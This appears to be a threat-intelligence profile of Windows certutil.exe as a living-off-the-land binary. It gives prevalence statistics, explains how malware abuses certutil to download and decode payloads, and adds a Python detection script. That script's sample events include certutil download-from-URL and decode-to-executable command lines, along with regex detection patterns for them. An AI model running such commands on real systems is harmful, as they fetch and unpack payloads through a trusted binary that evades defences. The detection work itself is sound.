555a8b4b7c5e9614e3ef7af2fafc6181aa98ad9d10ebfd845d82f33efeb7e1c7
Author: Microsoft
Source: Wild
Threat: LOLBin
Summary
Certutil.exe is a utility used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
EchoTrail Prevalence Score (EPS)
33.81
Rank Analysis
Host Prevalence
34.7%
Execution Rank
65,746th
Behavioral Analysis
Top Filenames
Top Paths
C:\Windows\System32
96.58 %
Top Network Ports
443
92.68 %
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
Security Analysis
Intel
Certutil.exe is normally meant to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains, according to Microsoft. However, it has been abused by malware because it can also download files and encode or decode them. Downloading through certutil lets an attacker retrieve a payload with a signed, trusted Windows binary, which can circumvent detections and defenses; encoding and decoding a payload serves the same purpose by hiding its true content until it is needed. Here is an example Sigma rule to help detect misuse of certutil.exe: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml
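As an added illustration of the detection idea above (not EchoTrail's code and not the linked Sigma rule itself), the following Python triages process-creation events for certutil's download, decode and encode switches; the sample events and the example.invalid host are constructed, not real telemetry.

```python
import ntpath
import re
from typing import List, Tuple

# Constructed sample process-creation events: (image path, command line).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\certutil.exe", "certutil -dump"),
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),
    (r"C:\Windows\System32\certutil.exe", "CertUtil /decode payload.txt out.exe"),
    (r"C:\Windows\System32\certutil.exe", "certutil -encode input.bin out.b64"),
    (r"C:\Windows\System32\certutil.exe", "certutil -verify cert.cer"),
    (r"C:\Windows\System32\cmd.exe", "cmd /c certutil -decode x y"),  # not certutil's own image
]

# Switch patterns for the behaviours the Intel text calls out. certutil accepts
# both '-' and '/' prefixes and is case-insensitive, so the regexes allow both.
INDICATORS = {
    "download":   re.compile(r"[-/]urlcache\b", re.I),
    "decode":     re.compile(r"[-/]decode(hex)?\b", re.I),
    "encode":     re.compile(r"[-/]encode(hex)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def certutil_indicators(image: str, cmdline: str) -> List[str]:
    """Return the indicator names matched by one event.

    Only events whose image is certutil.exe are considered; ntpath is used so
    Windows paths split correctly even when this runs on a non-Windows host.
    """
    if ntpath.basename(image).lower() != "certutil.exe":
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def triage(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Keep only the events that matched at least one indicator."""
    flagged = []
    for image, cmdline in events:
        hits = certutil_indicators(image, cmdline)
        if hits:
            flagged.append((cmdline, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(f"{', '.join(hits):22} {cmdline}")
```

The image check is deliberate: a `cmd.exe` event whose command line merely mentions certutil is left to the child certutil.exe event, which carries the switches actually executed.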